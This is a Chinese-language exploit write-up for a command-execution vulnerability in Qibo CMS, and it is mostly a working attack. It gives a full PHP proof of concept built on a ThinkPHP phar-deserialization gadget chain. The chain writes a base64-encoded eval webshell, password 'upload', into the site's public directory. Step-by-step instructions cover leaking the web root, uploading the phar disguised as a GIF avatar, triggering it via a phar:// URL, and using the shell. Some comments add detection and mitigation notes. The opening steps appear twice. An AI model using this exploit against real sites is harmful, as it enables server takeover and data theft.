[齐博CMS系统存在命令执行漏洞]
漏洞利用过程:
1 首先爆出网站根路径:
访问:
/index.php/cms/1
会在debug里看到网站根路径! 如果开了debug的话!
然后根据网站根路径修改poc! 看poc里的注释!
2 利用poc生成 phar文件
poc
[齐博CMS系统存在命令执行漏洞]
漏洞利用过程:
1 首先爆出网站根路径:
访问:
/index.php/cms/1
会在debug里看到网站根路径! 如果开了debug的话!
然后根据网站根路径修改poc! 看poc里的注释!
2 利用poc生成 phar文件
poc
<?php
namespace think\process\pipes {
// Stub that mirrors the framework class of the same name. Only the class name
// and property layout matter: the object is serialized into phar metadata, and
// presumably the real class's lifecycle methods (__destruct/__wakeup) then act
// on the deserialized $files — confirm against the framework source.
class Windows {
private $files = [];
public function __construct ( $files )
{
$this-> files = [ $files ]; // $files => a subclass of think\Model, i.e. new Pivot(); Model itself is abstract
}
}
}
namespace think {
// Stub of the framework's abstract Model. $append / $error are set so that,
// per the author's notes, accessing the "xxx" attribute routes to getError()
// and hands back the relation object stored in $error.
abstract class Model {
protected $append = [];
protected $error = null ;
public $parent ;
function __construct ( $output , $modelRelation )
{
$this-> parent = $output ; // $this->parent => think\console\Output
$this-> append = array ( "xxx"=> "getError" ); // names getError, which returns $this->error
$this-> error = $modelRelation ; // $this->error must be a Relation subclass that is also a OneToOne subclass ==> HasOne
}
}
}
namespace think\model {
use think\Model ;
// Concrete subclass so the abstract Model stub can be instantiated; it only
// forwards the two constructor arguments.
class Pivot extends Model {
function __construct ( $output , $modelRelation )
{
parent :: __construct ( $output , $modelRelation );
}
}
}
namespace think\model\relation {
// Empty concrete subclass: the author's note on Model requires a OneToOne
// subclass, and this name exists in the framework.
class HasOne extends OneToOne {
}
}
namespace think\model\relation {
// Stub of the framework's OneToOne relation. $query carries the next link of
// the object graph; $bindAttr supplies a value that, per the author's note, is
// passed as the second (by-reference) argument of a later call.
abstract class OneToOne
{
protected $selfRelation ;
protected $bindAttr = [];
protected $query ;
function __construct ( $query )
{
$this-> selfRelation = 0 ;
$this-> query = $query ; // $query points to Query
$this-> bindAttr = [ 'xxx' ]; // the $value, used as the second by-reference argument of the call
}
}
}
namespace think\db {
// Stub of the framework's Query; $model is not a model here but the Output
// object, which is what the chain needs next.
class Query {
protected $model ;
function __construct ( $model )
{
$this-> model = $model ; // $this->model => think\console\Output
}
}
}
namespace think\console {
// Stub of the framework's console Output. $styles names 'getAttr' and $handle
// is the session driver — presumably the real class forwards unknown method
// calls to $handle; confirm against the framework source.
class Output {
private $handle ;
protected $styles ;
function __construct ( $handle )
{
$this-> styles = [ 'getAttr' ];
$this-> handle =$handle ; // $handle -> think\session\driver\Memcached
}
}
}
namespace think\session\driver {
// Stub of the framework's Memcached session driver; its $handler is swapped
// for the file cache driver, which is the sink that performs the write.
class Memcached
{
protected $handler ;
function __construct ( $handle )
{
$this-> handler = $handle ; // $handle -> think\cache\driver\File
}
}
}
namespace think\cache\driver {
// Stub of the framework's file cache driver. The only meaningful value is
// options['path']: a php://filter write target whose decoded content lands
// under the site's public directory. The other options are presumably just
// plausible defaults so the deserialized driver behaves normally.
// Detection note: a cache 'path' beginning with php://filter/ (especially with
// convert.base64-decode) is never legitimate; alerting on that string in
// uploaded archives / serialized data catches this family of payloads.
class File
{
protected $options= null ;
protected $tag ;
function __construct (){
$this-> options= [
'expire' => 3600 ,
'cache_subdir' => false ,
'prefix' => '' ,
//'path' => '1111.php',
'path' => 'php://filter/convert.iconv.utf-8.utf-7|convert.base64-decode/resource=aaaPD9waHAgQGV2YWwoJF9QT1NUWyd1cGxvYWQnXSk7ZWNobygidXBsb2FkIik7Pz4/../../../../../../../../../../../phpstudy_pro/WWW/aaa/x1/public/b.php' , //win
/* /phpstudy_pro/WWW/aaa/x1/public/b.php: /phpstudy_pro/WWW/aaa/x1/ is the site root and differs per server; /public/b.php is where the webshell is written */
'data_compress' => false ,
];
$this-> tag = 'xxx' ;
}
}
}
namespace {
// Build the object graph and store it as phar metadata. Phar metadata is
// unserialized whenever the archive is touched through a filesystem function
// via the phar:// wrapper, which is what the later URL in this write-up does.
// Mitigation note: reject phar:// (and other stream wrappers) in any
// user-controllable path, and do not rely on extension or magic-byte checks
// alone — the stub below starts with "GIF89a" precisely to pass them.
$Memcached = new think\session\driver\Memcached ( new \think\cache\driver\File ());
$Output = new think\console\Output ( $Memcached );
$model = new think\db\Query ( $Output );
$HasOne = new think\model\relation\HasOne ( $model );
$window = new think\process\pipes\Windows ( new think\model\Pivot ( $Output , $HasOne ));
// echo urlencode(serialize($window));
$o = $window ;
$filename = '2.phar' ; // extension must be phar, otherwise the program will not run
file_exists ( $filename ) ? unlink ( $filename ) : null ; // start from a fresh archive
$phar= new Phar ( $filename );
$phar-> startBuffering ();
$phar-> setStub ( "GIF89a<?php __HALT_COMPILER(); ?>" ); // image magic bytes in front of the required phar stub
$phar-> setMetadata ( $o ); // the serialized object graph lives here
$phar-> addFromString ( "foo.txt" , "bar" ); // a phar needs at least one entry
$phar-> stopBuffering ();
}
3 生成phar文件 将后缀改成gif!
访问 会员中心:
点击修改个人资料:
用burp抓取 文件上传路径:
4 再访问下面url写入webshell:
/index.php/index/Image/headers?url=phar://./public/uploads/pop/20210915/2_20210915195309ac45c.gif
后面是刚刚上传的gif文件!
访问完成后,即可在网站目录下生成webshell.
5 访问webshell
/public/b.php12ac95f1498ce51d2d96a249c09c1998.php
shell写入成功! 密码是upload
总结
一直挖洞一直爽!